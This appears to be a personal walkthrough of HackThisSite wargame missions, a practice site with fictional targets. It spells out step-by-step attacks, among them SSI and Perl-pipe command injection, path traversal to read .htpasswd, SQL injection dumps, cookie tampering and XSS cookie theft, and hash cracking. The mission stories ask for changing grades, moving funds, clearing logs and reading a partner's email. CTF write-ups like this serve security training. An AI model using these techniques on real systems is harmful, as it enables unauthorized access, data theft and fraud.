As usual, the first three levels are been ignored, because they are just very simple.
1、Click 'Send password to Sam' button, We will see information like this:Password reminder successfully sent.
2、In level4 home page, we use f12 to view source code to see that how Sam to send password, and found this:<input type="hidden" name="to" value="webmaster@hulla-balloo.com">. So, just modify the email address to your own email, and click button to send password. We can see the password in web page. Done.
Summary: In this training, you should know how to view source of web page.
1、Input some thing to the text box, such as abc123, and result is ace468. OK, we found that a->a, b->c, c->e … Increasing is 0, 1, 2…
2、Decrypt 74ceggki. Done.
1、We can see that Sam use UNIX cal command to execute and return something, so input command like this:
You will find password file. Done.
Summary: In this training, you should know some knowledge about command injection and UNIX commands.
The problem is that how to find password file by submitting something, but don't find any clue.
1、User SSI to execute ls command in server side. First time, the directory maybe is not right, but try to use ../ to list dir. Done. In this test, we use <!--#exec cmd="ls ../"-->, but if the server's os is windows, you may use something like this <!--#exec cmd="dir"--> .
1、Message shows that we can get the file from level 8 test, and when view source code, these is nothing been found. So, back to level 8 and change the injection:<--#exec cmd="ls ../../9"-->. We got the password file. Done.
1、View source code, but found nothing useful.
2、Input anything and click submit button, we saw message like this:
You are not authorized to view this page. Since there is no any login function, how did it to validate authorization? Maybe we should intercept the request, when see cookie, and found an interest thing。
3、Intercept submit request, modify level10_authorized=no to level10_authorized=yes and submit. Done.
Summary: In this training, you should know something about authorization and Cookie.
1、When open the page, we can find nothing but something like this:
I love my music! "Believe " is the best!
This is useless for us. Can we find something useful? Again, we view source code, but this time we are unfortunately because we only find a comment like this:
<!--We even have our own collection - if you could find it!-->
2、It seemed that the only useful things we got are Apache and collection. When open the page again, I found that message is changed to:
I love my music! "I Feel Like a Bullet (In the Gun of Robert Ford)" is the best!
So refresh the page, found that the message is changed again:
I love my music! "Georgia " is the best!
I love my music! "I Need You to Turn To" is the best!
How to find the so-called collection?
3、Search these music in google and try to find some clues, and found that they all from Elton John! Maybe this is the collection. So we tyr to use directory listing like: /eltonjohn/. But fail again. /johnelton/? Fail again. /john/?/elton/? /j/? /e/?
4、From the message, we found that Apache was used. So open this in browser:
IndexIgnore DaAnswer.* .htaccess
5、Visit missions/basic/11/e/l/t/o/n/DaAnswer/ directory, follow information found:
The answer is not here! Just look a little harder.
6、Input password "not here" in missions/basic/index.php. Done!
Message: Hey man, I need a big favour from you. Remember that website I showed you once before? Uncle Arnold's Band Review Page? Well, a long time ago I made a $500 bet with a friend that my band would be at the top of the list by the end of the year. Well, as you already know, two of my band members have died in a horrendous car accident... but this ass hole still insists that the bet is on!
I know you're good with computers and stuff, so I was wondering, is there any way for you to hack this website and make my band on the top of the list? My band is Raging Inferno. Thanks a lot, man!
Solution:
View source code and tamper the rate data to a big number such as 1000.
Message: I have been informed that you have quite admirable hacking skills. Well, this racist hate group is using their website to organize a mass gathering of ignorant racist bastards. We cannot allow such bigoted aggression to happen. If you can gain access to their administrator page and post messages to their main page, we would be eternally grateful.
Solution:
View source code, and find update.php. Open it in browser and login page display.
Have a try to use SQL injection in username input, failed, password? Done
Message: I run this website where people can read and submit peace-related poetry. I am doing this out of good will towards others, and I don't see why I would be making enemies out of this, but some real ass hole hacked my website posting a bunch of ignorant aggressive propaganda on the front page. And I made that website a while ago, and I no longer have access to it. Do you think you can hack in and change it back? Please? Oh, and bonus points if you message me the name of the bastard who did this!
My website can be found here.
Solution:
View source code, and find this:
<!--Note to the webmasterThis website has been hacked, but not totally destroyed. The old website is still up. I simply copied the old index.html file to oldindex.html and remade this one. Sorry about the inconvenience.-->
So visit oldindex.html, and access to the old web site. There are two function: read and submit poetry.
Try to use index.html as the poetry name and submit, failed…
Try to use ../index.html as poetry name, and found that the content is not as old webpage. Copy it to this place. Done
Message: Hello, I was referred to you by a friend who says you know how to hack into computers and web sites - well I was wondering if you could help me out here. There's this local store who is killing hundreds of animals a day exclusively for the purpose of selling jackets and purses etc out of their skin! I have been to their website and they have an email list for their customers. I was wondering if you could somehow hack in and send me every email address on that list? I want to send them a message letting them know of the murder they are wearing. Just reply to this message with a list of the email addresses. Please? Their website is at http://www.hackthissite.org/missions/realistic/4/. Thanks so much!!
Solution:
Input both valid and invalid email and click "add to list", then found the table name.
View source code and found:/products.php?category=1, then change the parameter to test SQL injection.
Use UNION ALL SQL injection to get email list.
Message: Yo! This is Spiffomatic64 from Hackthissite.org! I'm a bit of a hacker myself as you can see, but I recently came upon a problem I couldn't resolve.....
Lately I've been getting calls day and night from the telemarketing place. I've gone to their website and hacked it once deleting all of their phone numbers so they wouldn't call me anymore. That was a temporary fix but they put their database back up, this time with an encrypted password. When I hacked them I noticed everything they used was 10 years out of date and the new password seems to be a 'message digest'. I have done some research and I think it could be something like a so-called hash value. I think you could somehow reverse engineer it or brute force it. I also think it would be a good idea to look around the server for anything that may help you.
Solution:
Clue found:Google was grabbing links it shouldn't be so I have taken extra precautions
Then encrypted password found, and a file named "hash" also found.
Open the "Hash" file, and "MD4" algorithm was found.
Message: Hello esteemed hacker, I hope you have some decent cryptography skills. I have some text I need decrypted.
I work for this company called ToxiCo Industrial Chemicals, which has recently come under fire because of the toxic chemicals we are dumping into the river nearby. Ecological inspectors have reported no problems, but it is widely speculated that they were paid off by ToxiCo management because the water pollution near the ToxiCo factory has always been a serious and widely publicized issue.
I have done some packet sniffing on my network and I have recovered this email that was sent from the CEO of the company to Chief Ecological Inspector Samuel Smith. However, it is encrypted and I cannot seem to decode it using any of my basic decryption tools. I have narrowed it down to the algorithm used to encrypt it, but it is beyond my scope. I was hoping you can take a look at it.
more details are on the page. If you can unscramble it and reply to this message with the original text, it would be much appreciated. Thank you.
Solution:
.74.40.67 181 = 83 + 49 + 49
.90.96.44 230 = 83 + 49 + 49 + 49
suppose orginal text is x, and encrypt key is "key":
sum(a+b+c) = ascii(x)+acsii(k) + acsii(e) + acsii(y)
List = [sum(a+b+c), sum(a1+b1+c1),…]
the most common word should be Space(Suggested that it is sum in the List. And it's ASCII value is 32).
acsii(k) + acsii(e) + acsii(y) = sum - ascii(32)
char(List[i] - (acsii(k) + acsii(e) + acsii(y)))
Message:
Message: Friend of freedom and liberty, I invite you to take a look at the hate speech being spewed over the web at http://www.hackthissite.org/missions/realistic/7/. It's so funny that conservatives keep saying they want to protect the values of America - freedom, tolerance, and democracy - but when it comes to personal choices like private marijuana use or same-sex marriages, they damn them to burn in eternal hell and send them to jail.
This is a personal freedom issue. No one else is hurt if two consenting adults decide to marry. But people who claim to have the moral high ground decide to ruin it for everyone else and discriminate against same-sex couples. To think that they are talking about making a constitutional amendment to STOP OUR FREEDOM TO MARRY is ludicrous. This injustice must be stopped.
There is an admin section on that website somewhere, perhaps hidden among their directory structure. It would be a great fight against moral tyranny and a victory for freedom if you could somehow hack into their website. Thank you.
Solution:
View source code, images directory was found.
admin directory need user name and password(apache authentication)
showimages.php?file=patriot.txt
Path traversal:showimages.php?file=images/admin/.htaccess
View source code:AuthUserFile /www/hackthissite.org/www/missions/realistic/7/images/admin/.htpasswd
Got user name and password:administrator:$1$AAODv...$gXPqGkIO3Cu6dnclE/sok1
Decrypt password and login
Message:
Message: Hey man, you gotta help me out, Gary Hunter, one of the richest men in America, has just deposited $10,000,000 into his bank account at the United Banks Of America and plans to donate that money to a campaign to hunt down and lock up all hackers. Now I've tried hacking their site but I'm just not good enough. That's why I need your help, Here's a list of your objectives:
1. Find the account of Gary Hunter (I don't know his account name).
2. Move the $10,000,000 into the account dropCash.
3. Clear The Logs, They're held in the folder 'logFiles'.
I really hope you can do this, because if you can't we're all screwed
Solution:
Make SQL injection at search.php.
Login with your account(Register your account). Change cookie "accountUsername" to GaryWilliamHunter and move the $10,000,000 into the account dropCash.
Change the hidden input "dir" value to logFiles and click "Clear Files In Personal Folder" button
Message:
I've heard you're good at hacking, and on the right side of things. So I came looking for you. I really need help, you see, my boss has stopped paying our salaries and I'm going to miss my rent! Please help me get my money, you can reach the site at Crappy Soft. They have an online payment system, but only he can use it. Maybe you can get into his account somehow, but for now you can use mine:
Username: r-conner@crappysoft.com
Solution:
Login with r-conner@crappysoft.com/ilovemywork
View Source code at Mail List, and found:./files/mailinglist/addresses.txt and ./files/logs/logs.txt
"strUsername", "strPassword" were found in Cookie
Send private message to "m-crap" with XSS(Because username and password were found in Cookie)
Change Cookie with the information you have found and pay salary to r-conner
In mailing list page, change input value of "strFilename" to the path of log file, input any characters without @ in the email address input and clike "Subscribe!" button
Message:
Message: hey man, it's me Zach, I need a favour from you, I'm in big trouble.
if you'll remember, I go to that super uptight religious school. well, two of my teachers are failing me because my lifestyle does not fall in line with their moralistic rules for public behaviour. My gym teacher even called me a 'long-haired hippie faggot'! And if I fail any classes, I won't graduate.
Listen, can you hack into the school's grade database and make it so I'm passing all my classes? I know they have this system set up on their website that allows teachers to submit grades and stuff, and I heard you pulled a few things in the past as well. Their web master was not thinking in terms of computer security when he was designing the website, so it might be easy. Or not. Please check it out here. The username to my account is 'Zach Sanchez' and my password is 'liberty638'. Thanks man!
Solution:
Get information:teacherinfo.php?id=1
Found login page: staff.php
Login with smiller/smiller:Please remember that access to the staff administration area is restricted to the district-supplied 'holy_teacher' web browser.
Change your web browser's user agent to holy_teacher
Change 'admin' value from 0 to 1 in Cookie
View source code and you will find the way to change grades
Message:
Message: Hello, I'm space46 from space46.nod. Up until recently, BudgetServ used to be a good host, but the company got new owners and some lame hosted site was deleted somehow. The administrators think that it was me and they've suspended my account. I've contacted them numerous times about getting my files back but they refuse. As it so happens, I made a backup in my web root named src.tar.gz right before the account was suspended. Can you get this file back so that I can move to a better host?
Solution:
webmail.php login:
Due to the recent security breach, WebMail is currently unavailable.
page.pl?page=email123:
open(file, "pages/email123") failed: No such file or directory
Found this in owasp->command injection:
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol “|” onto the end of the filename.
So, use this URL:page.pl?page=|ls|
admin bs.dbase client_http_docs frontpage.gif index.html letter.gif logo.gif ms.gif mysql.gif order.pl page.pl pages perl.gif php.gif server.gif sqlite.png suspended.html tux.gif webmail.php
client_http_docs dir listing
index.html Directory listing not shown here
suspended.html This account has been suspended.
webmail.php Due to the recent security breach, WebMail is currently unavailable.
Index of /var/www/budgetserv/client_http_docs
potatoworks/ potatoworks is currently under construction your potatoworks team
space46/ This account has been suspended.
therightwayradio/ client_http_docs/therightwayradio/?page=admin&add_mod=4729 Access denied
therightwayradio/logger.html
wonderdiet/ client_http_docs/wonderdiet/order.html Warning: fopen(pins.txt): failed to open stream: No such file or directory in /var/www/budgetserv/html/client_http_docs/wonderdiet/ on line 19. Cannot open file.
/11/client_http_docs/therightwayradio/?page=main : ./?page=main&id=1
When id is changed to 0, there is a "edit account" button.
So change the password and use the account to login.
/11/client_http_docs/therightwayradio/?page=mod
Use this SQL to get all the tables:SELECT name FROM sqlite_master WHERE type='table' ORDER BY name;
Change the DB to ../../../bs.dbase, and query the tables:
web_email web_user web_package web_pass
space46@space46.nod space46 -1 notofthisworld
rsmith@therightwayradio.nod therightwayradio 4 letgodsortitout
admin@wonderdiet.nod wonderdiet 1 suckereveryminute
Use the last two users to login at:/realistic/11/admin/
Download any file and then you will see the file path in URL, so change the URL to download the src.tar.gz under "space46" directory
Message:
Message: Hey it's OutThere from hackthissite.org. I've run into a problem that I can't seem to solve. As you may know, I go to Heartland High School, and our school put everything on the internet a few years ago. This was great at first, but then this really uptight guy, Jason Bardus, got a job as a computer teacher. He set up this overly restrictive web proxy and made it so that school computers could only connect to the district site. He hates people who know more than him, so he blocked all these hacker sites, open source websites, and he even blocked google! He is really paranoid about security, but I don't think he really knows what he is doing. The district site is here, and it runs on some crappy Windows 95 machine, if that helps. Can you clear the list of blocked pages by getting admin access? Please help me out, because information should be for everyone.
Solution:
Interesting things found:
student.html:
<input name="action" value="write" type="hidden">
<input name="text" size="50" type="text">
<input value="submit" type="submit">
12/cgi-bin/guest.pl?action=read&file=guestbook.txt
found: heartlandadminpanel.pl
12/cgi-bin/guest.pl?action=read&file=heartlandadminpanel.pl
View source code, found:
password:heartlandnetworkadministrator
Visit:12/cgi-bin/heartlandadminpanel.pl?username=jbardus&password=heartlandnetworkadministrator
Message:
Message: Hey, Josh Haze (a.k.a. Fr0zenB1t) here, I REALLY need some help. As you know, I'm in with the AOE (Anarchists of Elbonia). Our mission is to thwart the upcoming elections, and at least attempt to delay them for the time being. The way we've decided would work best is if one of the main competitor's site is taken down. Even if it is down for a small amount of time, things wont go smoothly for him, and things will be delayed...
BTW: Elbonia Election Site
Solution:
MySQL Error Reported: row "x" does not exist
Error in query: "SELECT post, date FROM newsTable WHERE month ="x"
"xxxyyyzzz@123.com" could not be added to "emails_table"
Please Contact Administrator
The following speeches have been given already:
SPEECH: 1 or 1=1 could not be found
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\oldsite\speches.php): failed to open stream: No such file or directory
Error on line 18 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\oldsite\speches.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 18 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\21232f297a57a5a743894a0e4a801fc3\speches.php): failed to open stream: No such file or directory
Error on line 24 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\21232f297a57a5a743894a0e4a801fc3\speches.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 24 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(C:\Program Files\Apache Group\Apache2\ENRP\admin\passes.php): failed to open stream: No such file or directory
Error on line 25 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
[2] include(): Failed opening 'C:\Program Files\Apache Group\Apache2\ENRP\admin\passes.php' for inclusion (include_path='.:/usr/local/share/pear')
Error on line 25 in /www/hackthissite.org/www/missions/realistic/13/speeches2.php
Passes need to be reset: send correct HTTP_REFERER to gain access here
MySQL Error: "1 or 1=1" row does not exist in table "press_table";
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in C:\Program Files\Apache Group\Apache2\ENRP\readpress.php on line 33
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$in = "GET /speeches/passwords/" . md5('Speeches') . "";
$in .= "REFERER: http://ENRP/get_speeches_passwords_referer\n";
socket_write($socket, $in, strlen($in));
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes\special.php\");
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes�ooter.php\");
include(\"C:\Program Files\Apache Group\Apache2\htdocs\ENRP\includes\arrange.php\");
13/oldsite/:Devs, we need to destroy the password "imhomealone" because, it's been leaked somehow - Daruman - August 9th
13/admin/passes.php with reffer(http://ENRP/get_speeches_passwords_referer):Correct HTTP_HEADEER
13/21232f297a57a5a743894a0e4a801fc3/:login page found
Speeches md5:7e40c181f9221f9c613adf8bb8136ea8
13/speeches/passwords/7e40c181f9221f9c613adf8bb8136ea8/:password.fip:
7bc35830abab8fced52657d38ea048df:21232f297a57a5a743894a0e4a801fc3
moni1 md5:7bc35830abab8fced52657d38ea048df
admin md5:21232f297a57a5a743894a0e4a801fc3
Message:
Message: You've probably heard of Yuppers Internet Solutions before. They started in 1997 and are now one of the top websites on the net. I was an intern at Yuppers for a time, but quit when I learned that the admins were selling user data and usage habits to advertisers while saying the opposite. Unfortunately, I couldn't get out of the building with any proof and don't have any high-level access. I do know, however, that much of the coding on their site was done by amateurs and is probably insecure. Can you hack in and get some proof?
Solution:
Sign up: Account creation was a success! You now have an email account, ender012@yuppers.nod, webspace on Y-Webs, and access to Yuppers! People.
(username/password:ender012/zc000111)
/realistic/14/news.cgi?story=news.cgi%00:
/realistic/14/news.cgi?story=search.cgi%00:
/realistic/14/news.cgi?story=.%00:
Login with isadmin in moderator.cgi
View Account Info with "*"
So you got the admin account and use this account to login in login.html
Message:
Message: Hi, please help me if you are against war like me. Rumours are saying that the seculas Ltd. company is developing an awful new laser aided weapon, and that they already have patents pending. Please try to find out what their latest patents are about. People say you know your shit and that you are an amazingly good hacker. It should not be a prob for someone with your skills. What I know is that seculas Ltd. hired a new programmer who is responsible for the server, and he passworded everything and always with different passwords. I heard about him, he is one the kind who locks the front door twice and leaves the back-door open.
If you think like me please help me and fight those people that make money with war.
Solution:
index.htm:
<meta name="Author" content="webadmin: Susy Slack, email s.slack@seculas.com">
questions.php: storequestion.php
storeapplication.php:_backups_/images/ok.gif zip file found
Note that PkZip prepends 12 random bytes to the compressed data before encryption, so the ciphertextfile has to be 12 bytes longer than the plaintext.
So use plaintext attack to unzip the zip file.
As we see in the source code:
if (ereg($msg_username . ": " . $msg_password . "\r*\n*$", $strLine, $regs))
So if there is some string like xxxadmin:correct_password,
Read message: directory found:admin_area
/realistic/15/admin_area/shell.php
Try to use these as user name to login, and click ok and cancel:
You will find some information displayed after you click cancel button.
Find the hash and decrypt it :
9e71fc2a99a71b722ead746b776b25ac: foobar
After login with root/foobar, files and directories found by "ls" command:
if (checkit(argv[1], argv[2], argv[3]) == 'Y')
strcpy(concatenated, username);
Message:
Message: Hi, I think my girlfriend is cheating on me! But I can't find proof for it. I know she uses SimpleMail, and it's quite new, so you might be able to hack it. Please! I really need to know if she is cheating on me, so I could move on. Chances are, SimpleMail will be VERY secure, but I believe that you could do it!
Just in case you're stuck, I've done some researches about it, and found some interesting comments in the source. Good luck!
Please save a heart, if not a relationship.
Oh yeah, her email is jenn@simplemail.com
Solution:
His GF's mail account: jenn@simplemail.com
index.php:
Sorry everyone, it seems we were having a problem with people registering who tried to use special characters in their name.
index.php?module=admin_login (Keep this hidden for now)
For now, we suggest sticking to just letters and numbers in your email address.
index.php?module=admin_login->login[1].swf:
index.php?module=home*_blank*authed**true
*admin.php?auth=true&id=63a4bf12cd*getURL*admin.php?auth=false*onEnterFrame*auth_page*length*real_auth*?user=*user*text*&pass=*p
ass*WaitForData2*MENU*ContextMenu*hideBuiltInItems*_root*menu*auth.php*btnLogin*onRelease*config.txt*WaitForData
config.txt:auth_page=auth.php
private message: auth_page=config.txt&authed=true&
Register new user with ".." as the email account and private message: auth_page=config.txt&authed=true&
auth_page=config.txt&authed=true&;
\\These is the user config file notes, anything with \\ in front is ignored
Login in:index.php?module=admin_login
1: ./check_email.php?auth=true&id=63a4bf12cd&email=
function2 CheckEmail($1=email) {
push './check_email.php?auth=true&id=63a4bf12cd&email='
check_email.php?auth=true&id=63a4bf12cd&email=jenn@simplemail.com
